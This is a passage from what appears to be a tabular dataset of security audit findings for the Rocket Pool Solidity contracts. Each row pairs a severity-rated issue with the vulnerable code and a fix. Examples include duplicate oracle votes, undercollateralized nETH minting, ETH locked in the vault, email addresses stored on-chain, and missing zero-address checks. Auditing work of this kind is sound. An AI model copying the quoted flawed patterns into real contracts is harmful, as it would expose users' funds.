true);\\nsetBool(keccak256(abi.encodePacked(""network.balances.submitted.node"", msg.sender, \\_block)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n// Emit balances submitted event\\nemit BalancesSubmitted(msg.sender, \\_block, \\_totalEth, \\_stakingEth, \\_rethSupply, block.timestamp);\\n// Check submission count & update network balances\\n```\\n\\n`RocketNetworkPrices` - a trusted node can submit multiple different results for the 
price at a specific block\\n```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(""network.prices.submitted.node"", msg.sender, \\_block, \\_rplPrice));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(""network.prices.submitted.count"", \\_block, \\_rplPrice));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), ""Duplicate submission from node"");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(""network.prices.submitted.node"", msg.sender, \\_block)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n// Emit prices submitted event\\nemit PricesSubmitted(msg.sender, \\_block, \\_rplPrice, block.timestamp);\\n// Check submission count & update network prices\\n```\\n",Only allow one vote per minipool/block. Don't give nodes the possibility to vote multiple times for different outcomes.,,"```\\n// Get submission keys\\nbytes32 nodeSubmissionKey = keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\nbytes32 submissionCountKey = keccak256(abi.encodePacked(""minipool.withdrawable.submitted.count"", \\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance));\\n// Check & update node submission status\\nrequire(!getBool(nodeSubmissionKey), ""Duplicate submission from node"");\\nsetBool(nodeSubmissionKey, true);\\nsetBool(keccak256(abi.encodePacked(""minipool.withdrawable.submitted.node"", msg.sender, \\_minipoolAddress)), true);\\n// Increment submission count\\nuint256 submissionCount = getUint(submissionCountKey).add(1);\\nsetUint(submissionCountKey, submissionCount);\\n```\\n" +RocketTokenNETH - Pot. discrepancy between minted tokens and deposited collateral,medium,"The `nETH` token is paid to node operators when minipool becomes withdrawable. 
`nETH` is supposed to be backed by `ETH` 1:1. However, in most cases, this will not be the case.\\nThe `nETH` minting and deposition of collateral happens in two different stages of a minipool. `nETH` is minted in the minipool state transition from `Staking` to `Withdrawable` when the trusted/oracle nodes find consensus on the fact that the minipool became withdrawable (submitWinipoolWithdrawable).\\n```\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n\\nWhen consensus is found on the state of the `minipool`, `nETH` tokens are minted to the `minipool` address according to the withdrawal amount observed by the trusted/oracle nodes. At this stage, `ETH` backing the newly minted `nETH` was not yet provided.\\n```\\nuint256 nodeAmount = getMinipoolNodeRewardAmount(\\n minipool.getNodeFee(),\\n userDepositBalance,\\n minipool.getStakingStartBalance(),\\n minipool.getStakingEndBalance()\\n);\\n// Mint nETH to minipool contract\\nif (nodeAmount > 0) { rocketTokenNETH.mint(nodeAmount, \\_minipoolAddress); }\\n```\\n\\nThe `nETH` token contract now holds more `nETH.totalsupply` than actual `ETH` collateral. It is out of sync with the `ETH` reserve and therefore becomes undercollateralized. This should generally be avoided as the security guarantees that for every `nETH` someone deposited, `ETH` does not hold. However, the newly minted `nETH` is locked to the `minipoolAddress`, and the minipool has no means of redeeming the `nETH` for `ETH` directly (via nETH.burn()).\\nThe transition from Withdrawable to `Destroyed` the actual collateral for the previously minted `nETH` (still locked to minipoolAddress) is provided by the `Eth2` withdrawal contract. There is no specification for the withdrawal contract as of now. 
Still, it is assumed that some entity triggers the payout for the `Eth2` rewards on the withdrawal contract, which sends the amount of `ETH` to the configured withdrawal address (the minipoolAddress).\\nThe `minipool.receive()` function receives the `ETH`\\n```\\nreceive() external payable {\\n (bool success, bytes memory data) = getContractAddress(""rocketMinipoolDelegate"").delegatecall(abi.encodeWithSignature(""receiveValidatorBalance()""));\\n if (!success) { revert(getRevertMessage(data)); }\\n}\\n```\\n\\nand forwards it to `minipooldelegate.receiveValidatorBalance`\\n```\\nrequire(msg.sender == rocketDAOProtocolSettingsNetworkInterface.getSystemWithdrawalContractAddress(), ""The minipool's validator balance can only be sent by the eth1 system withdrawal contract"");\\n// Set validator balance withdrawn status\\nvalidatorBalanceWithdrawn = true;\\n// Process validator withdrawal for minipool\\nrocketNetworkWithdrawal.processWithdrawal{value: msg.value}();\\n```\\n\\nWhich calculates the `nodeAmount` based on the `ETH` received and submits it as collateral to back the previously minted `nodeAmount` of `nETH`.\\n```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n// Set withdrawal processed status\\nrocketMinipoolManager.setMinipoolWithdrawalProcessed(msg.sender);\\n// Transfer node balance to nETH contract\\nif (nodeAmount > 0) { rocketTokenNETH.depositRewards{value: nodeAmount}(); }\\n// Transfer user balance to rETH contract or deposit pool\\n```\\n\\nLooking at how the `nodeAmount` of `nETH` that was minted was calculated and comparing it 
to how `nodeAmount` of `ETH` is calculated, we can observe the following:\\nthe `nodeAmount` of `nETH` minted is an absolute number of tokens based on the rewards observed by the trusted/oracle nodes. the `nodeAmount` is stored in the storage and later used to calculate the collateral deposit in a later step.\\nthe `nodeAmount` calculated when depositing the collateral is first assumed to be a `nodeShare` (line 47), while it is actually an absolute number. the `nodeShare` is then turned into a `nodeAmount` relative to the `ETH` supplied to the contract.\\nDue to rounding errors, this might not always exactly match the `nETH` minted (see https://github.com/ConsenSys/rocketpool-audit-2021-03/issues/26).\\nThe collateral calculation is based on the `ETH` value provided to the contract. If this value does not exactly match what was reported by the oracle/trusted nodes when minting `nETH`, less/more collateral will be provided.\\nNote: excess collateral will be locked in the `nETH` contract as it is unaccounted for in the `nETH` token contract and therefore cannot be redeemed.\\nNote: providing less collateral will go unnoticed and mess up the 1:1 `nETH:ETH` peg. In the worst case, there will be less `nETH` than `ETH`. Not everybody will be able to redeem their `ETH`.\\nNote: keep in mind that the `receive()` function might be subject to gas restrictions depending on the implementation of the withdrawal contract (.call() vs. .transfer())\\nThe `nETH` minted is initially uncollateralized and locked to the `minipoolAddress`, which cannot directly redeem it for `ETH`. The next step (next stage) is collateralized with the staking rewards (which, as noted, might not always completely add up to the minted nETH). 
At the last step in `withdraw()`, the `nETH` is transferred to the `withdrawalAddress` of the minipool.\\n```\\nuint256 nethBalance = rocketTokenNETH.balanceOf(address(this));\\nif (nethBalance > 0) {\\n // Get node withdrawal address\\n RocketNodeManagerInterface rocketNodeManager = RocketNodeManagerInterface(getContractAddress(""rocketNodeManager""));\\n address nodeWithdrawalAddress = rocketNodeManager.getNodeWithdrawalAddress(nodeAddress);\\n // Transfer\\n require(rocketTokenNETH.transfer(nodeWithdrawalAddress, nethBalance), ""nETH balance was not successfully transferred to node operator"");\\n // Emit nETH withdrawn event\\n emit NethWithdrawn(nodeWithdrawalAddress, nethBalance, block.timestamp);\\n}\\n```\\n\\nSince the `nETH` initially minted can never take part in the `nETH` token market (as it is locked to the minipool address, which can only transfer it to the withdrawal address in the last step), the question arises why it is actually minted early in the lifecycle of the minipool. At the same time, it could as well be just directly minted to `withdrawalAddress` when providing the right amount of collateral in the last step of the minipool lifecycle. 
Furthermore, if `nETH` is minted at this stage, it should be questioned why `nETH` is actually needed when you can directly forward the `nodeAmount` to the `withdrawalAddress` instead of minting an intermediary token that is pegged 1:1 to `ETH`.\\nFor reference, `depositRewards` (providing collateral) and `mint` are not connected at all, hence the risk of `nETH` being an undercollateralized token.\\n```\\nfunction depositRewards() override external payable onlyLatestContract(""rocketNetworkWithdrawal"", msg.sender) {\\n // Emit ether deposited event\\n emit EtherDeposited(msg.sender, msg.value, block.timestamp);\\n}\\n\\n// Mint nETH\\n// Only accepts calls from the RocketMinipoolStatus contract\\nfunction mint(uint256 \\_amount, address \\_to) override external onlyLatestContract(""rocketMinipoolStatus"", msg.sender) {\\n // Check amount\\n require(\\_amount > 0, ""Invalid token mint amount"");\\n // Update balance & supply\\n \\_mint(\\_to, \\_amount);\\n // Emit tokens minted event\\n emit TokensMinted(\\_to, \\_amount, block.timestamp);\\n}\\n```\\n","It looks like `nETH` might not be needed at all, and it should be discussed if the added complexity of having a potentially out-of-sync `nETH` token contract is necessary and otherwise remove it from the contract system as the `nodeAmount` of `ETH` can directly be paid out to the `withdrawalAddress` in the `receiveValidatorBalance` or `withdraw` transitions.\\nIf `nETH` cannot be removed, consider minting `nodeAmount` of `nETH` directly to `withdrawalAddress` on `withdraw` instead of first minting uncollateralized tokens. This will also reduce the gas footprint of the Minipool.\\nEnsure that the initial `nodeAmount` calculation matches the minted `nETH` and deposited to the contract as collateral (absolute amount vs. 
fraction).\\nEnforce that `nETH` requires collateral to be provided when minting tokens.",,"```\\nif (calcBase.mul(submissionCount).div(rocketDAONodeTrusted.getMemberCount()) >= rocketDAOProtocolSettingsNetwork.getNodeConsensusThreshold()) {\\n setMinipoolWithdrawable(\\_minipoolAddress, \\_stakingStartBalance, \\_stakingEndBalance);\\n}\\n```\\n" +RocketMiniPoolDelegate - on destroy() leftover ETH is sent to RocketVault where it cannot be recovered,medium,"When destroying the `MiniPool`, leftover `ETH` is sent to the `RocketVault`. Since `RocketVault` has no means to recover “unaccounted” `ETH` (not deposited via depositEther), funds forcefully sent to the vault will end up being locked.\\n```\\n// Destroy the minipool\\nfunction destroy() private {\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n rocketMinipoolManager.destroyMinipool();\\n // Self destruct & send any remaining ETH to vault\\n selfdestruct(payable(getContractAddress(""rocketVault"")));\\n}\\n```\\n",Implement means to recover and reuse `ETH` that was forcefully sent to the contract by `MiniPool` instances.,,"```\\n// Destroy the minipool\\nfunction destroy() private {\\n // Destroy minipool\\n RocketMinipoolManagerInterface rocketMinipoolManager = RocketMinipoolManagerInterface(getContractAddress(""rocketMinipoolManager""));\\n rocketMinipoolManager.destroyMinipool();\\n // Self destruct & send any remaining ETH to vault\\n selfdestruct(payable(getContractAddress(""rocketVault"")));\\n}\\n```\\n" +RocketDAO - personally identifiable member information (PII) stored on-chain Acknowledged,medium,"Like a DAO user's e-mail address, PII is stored on-chain and can, therefore, be accessed by anyone. 
This may allow de-pseudonymizing users (and correlate Ethereum addresses to user email addresses) and be used for spamming or targeted phishing campaigns, putting the DAO users at risk.\\nrocketpool-go-2.5-Tokenomics/dao/trustednode/dao.go:L173-L183\\n```\\n// Return\\nreturn MemberDetails{\\n Address: memberAddress,\\n Exists: exists,\\n ID: id,\\n Email: email,\\n JoinedBlock: joinedBlock,\\n LastProposalBlock: lastProposalBlock,\\n RPLBondAmount: rplBondAmount,\\n UnbondedValidatorCount: unbondedValidatorCount,\\n}, nil\\n```\\n\\n```\\nfunction getMemberEmail(address \\_nodeAddress) override public view returns (string memory) {\\n return getString(keccak256(abi.encodePacked(daoNameSpace, ""member.email"", \\_nodeAddress))); \\n}\\n```\\n",Avoid storing PII on-chain where it is readily available for anyone.,,"```\\n// Return\\nreturn MemberDetails{\\n Address: memberAddress,\\n Exists: exists,\\n ID: id,\\n Email: email,\\n JoinedBlock: joinedBlock,\\n LastProposalBlock: lastProposalBlock,\\n RPLBondAmount: rplBondAmount,\\n UnbondedValidatorCount: unbondedValidatorCount,\\n}, nil\\n```\\n" +RocketPoolMinipool - should check for address(0x0),medium,"The two implementations for `getContractAddress()` in `Minipool/Delegate` are not checking whether the requested contract's address was ever set before. If it were never set, the method would return `address(0x0)`, which would silently make all delegatecalls succeed without executing any code. 
In contrast, `RocketBase.getContractAddress()` fails if the requested contract is not known.\\nIt should be noted that this can happen if `rocketMinipoolDelegate` is not set in global storage, or it was cleared afterward, or if `_rocketStorageAddress` points to a contract that implements a non-throwing fallback function (may not even be storage at all).\\nMissing checks\\n```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(""contract.address"", \\_contractName)));\\n}\\n```\\n\\n```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(""contract.address"", \\_contractName)));\\n}\\n```\\n\\nChecks implemented\\n```\\nfunction getContractAddress(string memory \\_contractName) internal view returns (address) {\\n // Get the current contract address\\n address contractAddress = getAddress(keccak256(abi.encodePacked(""contract.address"", \\_contractName)));\\n // Check it\\n require(contractAddress != address(0x0), ""Contract not found"");\\n // Return\\n return contractAddress;\\n}\\n```\\n",Resolution\\nAddressed in branch `rp3.0-updates` (rocket-pool/[email protected]b424ca1) by changing requiring that the contract address is not `0x0`.\\nSimilar to `RocketBase.getContractAddress()` require that the contract is set.,,"```\\nfunction getContractAddress(string memory \\_contractName) private view returns (address) {\\n return rocketStorage.getAddress(keccak256(abi.encodePacked(""contract.address"", \\_contractName)));\\n}\\n```\\n" +RocketDAONodeTrustedAction - ambiguous event emitted in actionChallengeDecide,low,"`actionChallengeDecide` succeeds and emits `challengeSuccess=False` in case the challenged node defeats the challenge. It also emits the same event if another node calls `actionChallengeDecided` before the refute window passed. 
This ambiguity may make a defeated challenge indistinguishable from a challenge that was attempted to be decided too early (unless the component listening for the event also checks the refute window).\\n```\\n // Allow the challenged member to refute the challenge at anytime. If the window has passed and the challenge node does not run this method, any member can decide the challenge and eject the absent member\\n // Is it the node being challenged?\\n if(\\_nodeAddress == msg.sender) {\\n // Challenge is defeated, node has responded\\n deleteUint(keccak256(abi.encodePacked(daoNameSpace, ""member.challenged.block"", \\_nodeAddress)));\\n }else{\\n // The challenge refute window has passed, the member can be ejected now\\n if(getUint(keccak256(abi.encodePacked(daoNameSpace, ""member.challenged.block"", \\_nodeAddress))).add(rocketDAONodeTrustedSettingsMembers.getChallengeWindow()) < block.number) {\\n // Node has been challenged and failed to respond in the given window, remove them as a member and their bond is burned\\n \\_memberRemove(\\_nodeAddress);\\n // Challenge was successful\\n challengeSuccess = true;\\n }\\n }\\n // Log it\\n emit ActionChallengeDecided(\\_nodeAddress, msg.sender, challengeSuccess, block.timestamp);\\n}\\n```\\n",Avoid ambiguities when emitting events. Consider throwing an exception in the else branch if the refute window has not passed yet (minimal gas savings; it's clear that the call failed; other components can rely on the event only being emitted if there was a decision).,,"```\\n // Allow the challenged member to refute the challenge at anytime. 
If the window has passed and the challenge node does not run this method, any member can decide the challenge and eject the absent member\\n // Is it the node being challenged?\\n if(\\_nodeAddress == msg.sender) {\\n // Challenge is defeated, node has responded\\n deleteUint(keccak256(abi.encodePacked(daoNameSpace, ""member.challenged.block"", \\_nodeAddress)));\\n }else{\\n // The challenge refute window has passed, the member can be ejected now\\n if(getUint(keccak256(abi.encodePacked(daoNameSpace, ""member.challenged.block"", \\_nodeAddress))).add(rocketDAONodeTrustedSettingsMembers.getChallengeWindow()) < block.number) {\\n // Node has been challenged and failed to respond in the given window, remove them as a member and their bond is burned\\n \\_memberRemove(\\_nodeAddress);\\n // Challenge was successful\\n challengeSuccess = true;\\n }\\n }\\n // Log it\\n emit ActionChallengeDecided(\\_nodeAddress, msg.sender, challengeSuccess, block.timestamp);\\n}\\n```\\n" +"RocketDAOProtocolProposals, RocketDAONodeTrustedProposals - unused enum ProposalType",low,"The enum `ProposalType` is defined but never used.\\n```\\nenum ProposalType {\\n Invite, // Invite a registered node to join the trusted node DAO\\n Leave, // Leave the DAO\\n Replace, // Replace a current trusted node with a new registered node, they take over their bond\\n Kick, // Kick a member from the DAO with optional penalty applied to their RPL deposit\\n Setting // Change a DAO setting (Quorum threshold, RPL deposit size, voting periods etc)\\n}\\n```\\n\\n```\\nenum ProposalType {\\n Setting // Change a DAO setting (Node operator min/max fees, inflation rate etc)\\n}\\n```\\n",Remove unnecessary code.,,"```\\nenum ProposalType {\\n Invite, // Invite a registered node to join the trusted node DAO\\n Leave, // Leave the DAO\\n Replace, // Replace a current trusted node with a new registered node, they take over their bond\\n Kick, // Kick a member from the DAO with optional penalty applied to their 
RPL deposit\\n Setting // Change a DAO setting (Quorum threshold, RPL deposit size, voting periods etc)\\n}\\n```\\n" +RocketDaoNodeTrusted - Unused events,low,"The `MemberJoined` and `MemberLeave` events are not used within `RocketDaoNodeTrusted`.\\n```\\n// Events\\nevent MemberJoined(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time); \\nevent MemberLeave(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time);\\n```\\n",Consider removing the events. Note: `RocketDAONodeTrustedAction` is emitting `ActionJoin` and `ActionLeave` events.,,"```\\n// Events\\nevent MemberJoined(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time); \\nevent MemberLeave(address indexed \\_nodeAddress, uint256 \\_rplBondAmount, uint256 time);\\n```\\n" +"RocketDAOProposal - expired, and defeated proposals can be canceled",low,"The `RocketDAOProposal.getState` function defaults a proposal's state to `ProposalState.Defeated`. While this fallback can be considered secure, the remaining code does not perform checks that prevent defeated proposals from changing their state. As such, a user can transition a proposal that is `Expired` or `Defeated` to `Cancelled` by using the `RocketDAOProposal.cancel` function. 
This can be used to deceive users and potentially bias future votes.\\nThe method emits an event that might trigger other components to perform actions.\\n```\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n\\n```\\nfunction cancel(address \\_member, uint256 \\_proposalID) override public onlyDAOContract(getDAO(\\_proposalID)) {\\n // Firstly make sure this proposal that hasn't already been executed\\n require(getState(\\_proposalID) != ProposalState.Executed, ""Proposal has already been executed"");\\n // Make sure this proposal hasn't already been successful\\n require(getState(\\_proposalID) != ProposalState.Succeeded, ""Proposal has already succeeded"");\\n // Only allow the proposer to cancel\\n require(getProposer(\\_proposalID) == \\_member, ""Proposal can only be cancelled by the proposer"");\\n // Set as cancelled now\\n setBool(keccak256(abi.encodePacked(daoProposalNameSpace, ""cancelled"", \\_proposalID)), true);\\n // Log it\\n emit ProposalCancelled(\\_proposalID, \\_member, block.timestamp);\\n}\\n```\\n","Preserve the true outcome. Do not allow to cancel proposals that are already in an end-state like `canceled`, `expired`, `defeated`.",,"```\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n" +RocketDAOProposal - preserve the proposals correct state after expiration,low,"The state of proposals is resolved to give a preference to a proposal being `expired` over the actual result which may be `defeated`. The preference for a proposal's status is checked in order: `cancelled? -> executed? -> `expired`? -> succeeded? -> pending? -> active? 
-> `defeated` (default)`\\n```\\nif (getCancelled(\\_proposalID)) {\\n // Cancelled by the proposer?\\n return ProposalState.Cancelled;\\n // Has it been executed?\\n} else if (getExecuted(\\_proposalID)) {\\n return ProposalState.Executed;\\n // Has it expired?\\n} else if (block.number >= getExpires(\\_proposalID)) {\\n return ProposalState.Expired;\\n // Vote was successful, is now awaiting execution\\n} else if (votesFor >= getVotesRequired(\\_proposalID)) {\\n return ProposalState.Succeeded;\\n // Is the proposal pending? Eg. waiting to be voted on\\n} else if (block.number <= getStart(\\_proposalID)) {\\n return ProposalState.Pending;\\n // The proposal is active and can be voted on\\n} else if (block.number <= getEnd(\\_proposalID)) {\\n return ProposalState.Active;\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n",consider checking for `voteAgainst` explicitly and return `defeated` instead of `expired` if a proposal was `defeated` and is queried after expiration. Preserve the actual proposal result.,,"```\\nif (getCancelled(\\_proposalID)) {\\n // Cancelled by the proposer?\\n return ProposalState.Cancelled;\\n // Has it been executed?\\n} else if (getExecuted(\\_proposalID)) {\\n return ProposalState.Executed;\\n // Has it expired?\\n} else if (block.number >= getExpires(\\_proposalID)) {\\n return ProposalState.Expired;\\n // Vote was successful, is now awaiting execution\\n} else if (votesFor >= getVotesRequired(\\_proposalID)) {\\n return ProposalState.Succeeded;\\n // Is the proposal pending? Eg. 
waiting to be voted on\\n} else if (block.number <= getStart(\\_proposalID)) {\\n return ProposalState.Pending;\\n // The proposal is active and can be voted on\\n} else if (block.number <= getEnd(\\_proposalID)) {\\n return ProposalState.Active;\\n} else {\\n // Check the votes, was it defeated?\\n // if (votesFor <= votesAgainst || votesFor < getVotesRequired(\\_proposalID))\\n return ProposalState.Defeated;\\n}\\n```\\n" +RocketRewardsPool - registerClaimer should check if a node is already disabled before decrementing rewards.pool.claim.interval.claimers.total.next,low,"The other branch in `registerClaimer` does not check whether the provided `_claimerAddress` is already disabled (or invalid). This might lead to inconsistencies where `rewards.pool.claim.interval.claimers.total.next` is decremented because the caller provided an already deactivated address.\\nThis issue is flagged as `minor` since we have not found an exploitable version of this issue in the current codebase. However, we recommend safeguarding the implementation instead of relying on the caller to provide sane parameters. 
Registered Nodes cannot unregister, and Trusted Nodes are unregistered when they leave.\\n```\\nfunction registerClaimer(address \\_claimerAddress, bool \\_enabled) override external onlyClaimContract {\\n // The name of the claiming contract\\n string memory contractName = getContractName(msg.sender);\\n // Record the block they are registering at\\n uint256 registeredBlock = 0;\\n // How many users are to be included in next interval\\n uint256 claimersIntervalTotalUpdate = getClaimingContractUserTotalNext(contractName);\\n // Ok register\\n if(\\_enabled) {\\n // Make sure they are not already registered\\n require(getClaimingContractUserRegisteredBlock(contractName, \\_claimerAddress) == 0, ""Claimer is already registered"");\\n // Update block number\\n registeredBlock = block.number;\\n // Update the total registered claimers for next interval\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.interval.claimers.total.next"", contractName)), claimersIntervalTotalUpdate.add(1));\\n }else{\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.interval.claimers.total.next"", contractName)), claimersIntervalTotalUpdate.sub(1));\\n }\\n // Save the registered block\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.contract.registered.block"", contractName, \\_claimerAddress)), registeredBlock);\\n}\\n```\\n","Ensure that `getClaimingContractUserRegisteredBlock(contractName, _claimerAddress)` returns `!=0` before decrementing the `.total.next`.",,"```\\nfunction registerClaimer(address \\_claimerAddress, bool \\_enabled) override external onlyClaimContract {\\n // The name of the claiming contract\\n string memory contractName = getContractName(msg.sender);\\n // Record the block they are registering at\\n uint256 registeredBlock = 0;\\n // How many users are to be included in next interval\\n uint256 claimersIntervalTotalUpdate = getClaimingContractUserTotalNext(contractName);\\n // Ok register\\n if(\\_enabled) {\\n // Make sure they are not 
already registered\\n require(getClaimingContractUserRegisteredBlock(contractName, \\_claimerAddress) == 0, ""Claimer is already registered"");\\n // Update block number\\n registeredBlock = block.number;\\n // Update the total registered claimers for next interval\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.interval.claimers.total.next"", contractName)), claimersIntervalTotalUpdate.add(1));\\n }else{\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.interval.claimers.total.next"", contractName)), claimersIntervalTotalUpdate.sub(1));\\n }\\n // Save the registered block\\n setUint(keccak256(abi.encodePacked(""rewards.pool.claim.contract.registered.block"", contractName, \\_claimerAddress)), registeredBlock);\\n}\\n```\\n" +RocketNetworkPrices - Price feed update lacks block number sanity check,low,"Trusted nodes submit the RPL price feed. The function is called specifying a block number and the corresponding RPL price for that block. If a DAO vote goes through for that block-price combination, it is written to storage. In the unlikely scenario that a vote confirms a very high block number such as `uint(-1)`, all future price updates will fail due to the `require` check below.\\nThis issue becomes less likely the more active members the DAO has. Thus, it's considered a minor issue that mainly affects the initial bootstrapping process.\\n```\\n// Check block\\nrequire(\\_block > getPricesBlock(), ""Network prices for an equal or higher block are set"");\\n```\\n","The function's `_block` parameter should be checked to prevent large block numbers from being submitted. 
This check could, e.g., specify that node operators are only allowed to submit price updates for a maximum of x blocks ahead of `block.number`.",,"```\\n// Check block\\nrequire(\\_block > getPricesBlock(), ""Network prices for an equal or higher block are set"");\\n```\\n" +RocketDepositPool - Potential gasDoS in assignDeposits Acknowledged,low,"`assignDeposits` seems to be a gas heavy function, with many external calls in general, and few of them are inside the for loop itself. By default, `rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments()` returns `2`, which is not a security concern. Through a DAO vote, the settings key `deposit.assign.maximum` can be set to a value that exhausts the block gas limit and effectively deactivates the deposit assignment process.\\n```\\nfor (uint256 i = 0; i < rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments(); ++i) {\\n // Get & check next available minipool capacity\\n```\\n","The `rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments()` return value could be cached outside the loop. 
Additionally, a check should be added that prevents unreasonably high values.",,```\\nfor (uint256 i = 0; i < rocketDAOProtocolSettingsDeposit.getMaximumDepositAssignments(); ++i) {\\n // Get & check next available minipool capacity\\n```\\n +RocketNetworkWithdrawal - ETH dust lockup due to rounding errors,low,There's a potential `ETH` dust lockup when processing a withdrawal due to rounding errors when performing a division.\\n```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n```\\n,Calculate `userAmount` as `msg.value - nodeAmount` instead. This should also save some gas.,,```\\nuint256 totalShare = rocketMinipoolManager.getMinipoolWithdrawalTotalBalance(msg.sender);\\nuint256 nodeShare = rocketMinipoolManager.getMinipoolWithdrawalNodeBalance(msg.sender);\\nuint256 userShare = totalShare.sub(nodeShare);\\n// Get withdrawal amounts based on shares\\nuint256 nodeAmount = 0;\\nuint256 userAmount = 0;\\nif (totalShare > 0) {\\n nodeAmount = msg.value.mul(nodeShare).div(totalShare);\\n userAmount = msg.value.mul(userShare).div(totalShare);\\n}\\n```\\n +RocketAuctionManager - calcBase should be declared constant,low,"Declaring the same constant value `calcBase` multiple times as local variables to some methods in `RocketAuctionManager` carries the risk that if that value is ever updated, one of the value assignments might be missed. It is therefore highly recommended to reduce duplicate code and declare the value as a public constant. 
This way, it is clear that the same `calcBase` is used throughout the contract, and there is a single point of change in case it ever needs to be changed.\\n```\\nfunction getLotPriceByTotalBids(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotTotalRPLAmount(\\_index));\\n}\\n```\\n\\n```\\nfunction getLotClaimedRPLAmount(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotCurrentPrice(\\_index));\\n}\\n```\\n\\n```\\n// Calculation base value\\nuint256 calcBase = 1 ether;\\n```\\n\\n```\\nuint256 bidAmount = msg.value;\\nuint256 calcBase = 1 ether;\\n```\\n\\n```\\n// Calculate RPL claim amount\\nuint256 calcBase = 1 ether;\\nuint256 rplAmount = calcBase.mul(bidAmount).div(currentPrice);\\n```\\n","Consider declaring `calcBase` as a private const state var instead of re-declaring it with the same value in multiple, multiple functions. 
Constant, literal state vars are replaced in a preprocessing step and do not require significant additional gas when accessed than normal state vars.",,```\\nfunction getLotPriceByTotalBids(uint256 \\_index) override public view returns (uint256) {\\n uint256 calcBase = 1 ether;\\n return calcBase.mul(getLotTotalBidAmount(\\_index)).div(getLotTotalRPLAmount(\\_index));\\n}\\n```\\n +RocketDAO* - daoNamespace is missing a trailing dot; should be declared constant/immutable,low,"`string private daoNameSpace = 'dao.trustednodes'` is missing a trailing dot, or else there's no separator when concatenating the namespace with the vars.\\nrequests `dao.trustednodesmember.index` instead of `dao.trustednodes.member.index`\\n```\\nfunction getMemberAt(uint256 \\_index) override public view returns (address) {\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(""addressSetStorage""));\\n return addressSetStorage.getItem(keccak256(abi.encodePacked(daoNameSpace, ""member.index"")), \\_index);\\n}\\n```\\n\\n```\\n// The namespace for any data stored in the trusted node DAO (do not change)\\nstring private daoNameSpace = 'dao.trustednodes';\\n```\\n\\n```\\n// Calculate using this as the base\\nuint256 private calcBase = 1 ether;\\n\\n// The namespace for any data stored in the trusted node DAO (do not change)\\nstring private daoNameSpace = 'dao.trustednodes';\\n```\\n\\n```\\n// The namespace for any data stored in the network DAO (do not change)\\nstring private daoNameSpace = 'dao.protocol';\\n```\\n",Remove the `daoNameSpace` and add the prefix to the respective variables directly.,,"```\\nfunction getMemberAt(uint256 \\_index) override public view returns (address) {\\n AddressSetStorageInterface addressSetStorage = AddressSetStorageInterface(getContractAddress(""addressSetStorage""));\\n return addressSetStorage.getItem(keccak256(abi.encodePacked(daoNameSpace, ""member.index"")), \\_index);\\n}\\n```\\n" +RocketVault - consider 
